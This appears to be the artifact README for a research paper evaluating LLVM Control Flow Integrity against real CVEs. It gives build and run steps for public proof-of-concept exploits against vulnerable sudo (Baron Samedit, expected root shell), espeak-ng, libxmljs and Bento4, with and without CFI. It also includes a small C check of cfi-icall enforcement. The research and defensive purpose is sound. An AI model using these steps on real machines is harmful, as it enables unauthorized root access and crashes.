SoK: Preventing Real-World Exploits: A Practical Guideline and Taxonomy to LLVM's Control Flow Integrity
Access artifacts via the following OSF link.
All containers are created using podman; however, they can also be used with Docker.
The installation instructions for podman can be found here, and for Docker here or here.
For each CVE we have a separate container, which was exported into a .tar file and can be found in the respective folder. They can be imported and used by:
# Restore container as a new image
podman import <container>.tar <your_image>
# Run and enter the container
podman run -it --name <your_container_name> --user exploit <your_image>
# Start and enter the container if it is already created
podman start <your_container_name>
podman exec -it --user exploit <your_container_name> /bin/bash
For Docker the commands are the same; just replace podman with docker.
How to trigger the PoCs/exploits with and without CFI is described within the directory of each CVE.
Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character [NVD].
sudo apt-get install clang lld make
git clone https://github.com/sudo-project/sudo.git
cd sudo
git checkout tags/SUDO_1_8_21p2
./configure CC=clang
make
./conf_sudo <absolute/path/to/sudo/directory>
git clone https://github.com/CptGibbon/CVE-2021-3156
cd CVE-2021-3156
sed -i 's#/usr/bin/sudoedit#/home/exploit/sudo/src/.libs/sudoedit#g' exploit.c
make
./exploit
Expected output (root shell): #
./configure CC=clang CXX=clang++ \
CFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fno-sanitize-trap=cfi-icall' \
CXXFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fno-sanitize-trap=cfi-icall' \
LDFLAGS='-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld -fno-sanitize-trap=cfi-icall'
make
Configure the new sudo to make it executable
../conf_sudo /home/exploit/cfi_icall/
make <cfi-variant>
./<cfi-variant>_exploit
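Before relying on a cfi-icall build of one of the targets above, it is worth confirming on a two-function program that the toolchain actually enforces the check. The following is an added example, not part of the artifact; the file name cfi_icall_check.c and the compile command in its header comment are assumptions, using the same cfi-icall flags that the artifact passes to ./configure above.

```c
/* cfi_icall_check.c: minimal toolchain sanity check for LLVM's cfi-icall.
 * Added example, not part of the artifact. Build it with the flags the
 * artifact uses for sudo (assumed command):
 *   clang -flto -fvisibility=hidden -fsanitize=cfi-icall \
 *         -fno-sanitize-trap=cfi-icall -fuse-ld=lld cfi_icall_check.c -o check
 * Run ./check: the well-typed call succeeds, the type-confused one is reported
 * and the process aborts. Built without -fsanitize=cfi-icall, both calls run.
 */
#include <stdio.h>

typedef int  (*int_fn)(int);
typedef void (*void_fn)(void);

static int  add_one(int x) { return x + 1; }
static void hello(void)    { puts("hello from a void(void) function"); }

/* Every call below goes through a pointer of static type int (int).
 * cfi-icall checks at this call site that the target's declared type matches. */
static int dispatch(int_fn f, int x) { return f(x); }

/* Matching signature: passes the CFI check in every build. The volatile keeps
 * the optimizer from turning the indirect call into a direct one. */
int well_typed_call(void) {
    volatile int_fn good = add_one;
    return dispatch(good, 41);          /* returns 42 */
}

/* Mismatched signature: hello is void (void) but is called as int (int).
 * The cast is legal C, so nothing warns at compile time; only the runtime
 * check inserted by -fsanitize=cfi-icall stops the call. */
int type_confused_call(void) {
    volatile int_fn bad = (int_fn)(void_fn)hello;
    return dispatch(bad, 41);
}

int main(void) {
    printf("well-typed call returned %d\n", well_typed_call());
    puts("now calling through a mismatched pointer...");
    /* With -fno-sanitize-trap=cfi-icall the report reads roughly:
     *   runtime error: control flow integrity check for type 'int (int)'
     *   failed during indirect function call
     * With the default trap mode the process dies with SIGILL instead. */
    type_confused_call();
    puts("UNREACHED when CFI is enforced");
    return 0;
}
```

The diagnostic text is the reason the artifact builds with -fno-sanitize-trap: a trap would only show as an illegal instruction, while the non-trapping mode names the expected call type.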
Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c [NVD, Official issue].
1. Get source code and build (Official build instructions)
git clone https://github.com/espeak-ng/espeak-ng.git
sudo apt-get install \
make autoconf automake libtool pkg-config \
gcc g++ clang \
libsonic-dev ronn kramdown \
libpcaudio-dev
In ./src/libespeak-ng/wavegen.c change int samplerate = 0; to extern int samplerate;
./autogen.sh
CC=clang CFLAGS=-Wextra ./configure --prefix=/usr
make
git clone https://github.com/SEU-SSL/Poc.git
export ESPEAK_DATA_PATH=/home/exploit/espeak-ng/espeak-ng-data
/home/exploit/check_espeak-ng/src/espeak-ng \
-f /home/exploit/Poc/espeak-ng/id_000000,sig_08,src_003156+002428,op_splice,rep_32 \
-w /dev/null
The expected output without protection is: Floating point exception (core dumped) [source]
Replace cfi-unrelated-cast with the CFI variant to test.
CC=clang CXX=clang++ \
CFLAGS="-Wextra -fsanitize=cfi-icall -fvisibility=hidden -flto=thin -fno-sanitize-trap=cfi-icall" \
CXXFLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin -fno-sanitize-trap=cfi-icall" \
LDFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld -Wl,--allow-multiple-definition -fno-sanitize-trap=cfi-icall" \
./configure --prefix=/usr
ESPEAK_DATA_PATH=/home/exploit/cfi_icall/espeak-ng-data \
/home/exploit/cfi_icall/src/espeak-ng \
-f /home/exploit/Poc/espeak-ng/id_000000,sig_08,src_003156+002428,op_splice,rep_32 \
-w /dev/null
libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking a function on the result of attrs() that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled) [NVD].
npm run build
"configure": "cd vendor/libxml2.config && cmake configure ../libxml2 && cd ../.."
cd vendor/libxml2.config
add #define LIBXML_EXPR_ENABLED 1 to config.h
change "build": "node-gyp rebuild -j max" to "build": "node-gyp rebuild -j max && npm run tsc"
CC=clang CXX=clang++ CFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fno-sanitize-trap=cfi-nvcall" CXXFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fno-sanitize-trap=cfi-nvcall" LDFLAGS="-flto -fvisibility=hidden -fsanitize=cfi-nvcall -fuse-ld=lld -fno-sanitize-trap=cfi-nvcall" npm run build
mv build/Release/obj.target/xmljs.node build/Release/
./node/out/Release/node exploit.js
Expected output: Segmentation fault (core dumped)
A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_LinearReader::Advance of the file Ap4LinearReader.cpp of the component mp42ts. The manipulation leads to use after free. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-212006 is the identifier assigned to this vulnerability [NVD].
git clone https://github.com/axiomatic-systems/Bento4
cd Bento4
mkdir check_build && cd check_build
cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_BUILD_TYPE=Release
make -j
wget https://github.com/axiomatic-systems/Bento4/files/9744391/mp42ts_poc.zip
unzip mp42ts_poc.zip
/home/exploit/Bento4/check_build/mp42ts /home/exploit/mp42ts_poc /dev/null
Expected output:
free(): double free detected in tcache 2
Aborted (core dumped)
sudo apt-get install llvm-10-tools
cmake ../ \
-DCMAKE_C_COMPILER=clang \
-DCMAKE_CXX_COMPILER=clang++ \
-DCMAKE_C_FLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin" \
-DCMAKE_CXX_FLAGS="-fsanitize=cfi-icall -fvisibility=hidden -flto=thin" \
-DCMAKE_EXE_LINKER_FLAGS="-flto -fvisibility=hidden -fsanitize=cfi-icall -fuse-ld=lld" \
-DCMAKE_BUILD_TYPE=Release